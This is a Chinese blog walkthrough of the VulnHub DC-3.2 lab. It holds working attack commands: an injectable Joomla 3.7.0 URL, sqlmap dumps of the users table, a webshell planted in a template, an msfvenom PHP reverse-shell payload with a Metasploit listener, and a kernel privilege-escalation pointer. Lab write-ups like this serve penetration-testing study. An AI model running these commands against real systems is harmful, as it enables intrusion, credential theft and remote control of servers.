vulnhub之DC3.2靶机

最新推荐文章于 2022-11-30 18:38:20 发布
最新推荐文章于 2022-11-30 18:38:20 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 靶机 文章标签: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122971795
版权

目录

介绍

系列: DC(此系列共10台)
发布日期:2020年4月25日
难度:初级-中级
Flag:获取root权限并读取唯一的Flag
学习:

  • sql注入
  • 挂马
  • 提权

靶机地址:https://www.vulnhub.com/entry/dc-32,312/
从靶场得到提示信息:

  • 靶机更适用Virtualbox

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.1.101,开放了80端口
在这里插入图片描述

访问网站

看网站图标,直接知道是joomla的cms
在这里插入图片描述

Joomla漏扫网站,发现了cms版本:3.7.0;发现后台地址:http://192.168.1.101/administrator/
在这里插入图片描述

漏洞发现

发现此版本的cms存在漏洞,并且利用脚本提供了利用方式。

searchsploit Joomla 3.7.0
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述

尝试访问一下利用的代码提供的地址,发现确实存在漏洞:

http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

在这里插入图片描述

Sqlmap注入

  1. 列举数据库名:
sqlmap -u "http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

在这里插入图片描述

  1. 获知当前数据库名字,得知是:joomladb
sqlmap -u "http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --current-db

在这里插入图片描述

  1. 获取 joomladb 数据库的表名有哪些。猜测应该是下图红框中的表。
sqlmap -u "http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

在这里插入图片描述

  1. 获取 #__users 表中的列:
sqlmap -u "http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns

在这里插入图片描述

在这里插入图片描述

  1. 获取表中的数据:
sqlmap -u "http://192.168.1.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C "name,password" --dump

在这里插入图片描述

  1. 破解密码。得到:snoopy

在这里插入图片描述

挂马

寻找可以上传木马的地方
在这里插入图片描述

这里随意点开一个站点
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

接下来的情况,就是同之前的靶场 DC8 、DC7 一样了。由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。这里比较大的一个问题是怎么连接上msf,因为这个php页面不知道怎么打开,经过分析观察后注意到上图红框中的内容,猜测出路径应该是:http://192.168.1.101/templates/beez3/nima.php

生成后门
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.118 lport=4444 -f raw

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit

获取交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

提权

发现靶场的版本较低,可能存在漏洞
在这里插入图片描述

发现本地提权漏洞
在这里插入图片描述

查看利用说明:cat /usr/share/exploitdb/exploits/linux/local/39772.txt
发现利用地址:
在这里插入图片描述

下载文件,kali开启web服务供靶机下载下来。
在这里插入图片描述

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-3.2靶机
weixin_45778886的博客
11-22 3341
下载安装 靶场的下载:http://www.five86.com/downloads/DC-3-2.zip 信息收集 存后活主机探测 nmap -sP 192.168.124.0/24 端口服务探测 nmap -A 192.168.124.23 目录扫描 python3 dirsearch.py -u http://192.168.124.23/ -e* -i 200 发现管理员登录界面 网站服务探测 访问网站 网站的内容管理系统为Joomla.操作系统为Ubuntu. Joomla的版本为
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 1023
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1480
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
dc-3 靶机渗透学习
..
03-17 3519
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-CSDN博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
DC-3靶机
m0_57954651的博客
10-01 1855
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
DC-3靶机详细渗透过程
MRS_jianai的博客
11-30 797
dc-3靶机详细渗透教程
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4617
dc-9靶场详细渗透过程
vulnhub靶机DC7
weixin_52450702的博客
10-24 1590
靶机下载地址探测的靶机ip是192.168.70.154要注意可能在导入文件到VMware时候会出现的问题:需要改一下网络适配器的连接方式为NAT靶机描述:使用暴力破解或者字典破解,这将很难成功。
vulnhub靶机DC4
weixin_52450702的博客
11-02 608
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
DC-3渗透实战(详细过程)
tzyyyyyy的博客
10-16 2592
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2690
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2753
dc-5靶场详细渗透过程
2022-渗透测试-DC靶场的下载、安装与访问
保持微笑的博客
02-03 4857
目录 1.DC靶场下载 2.DC靶场的安装 3.DC靶场的访问 1.DC靶场下载 下载链接如下 Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。 2.DC靶场的安装 以DC-1为例,将文件解压。 打开虚拟机,选择解压好的文件 导入虚拟机 ...
vulnhub靶机系列:
最新发布
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值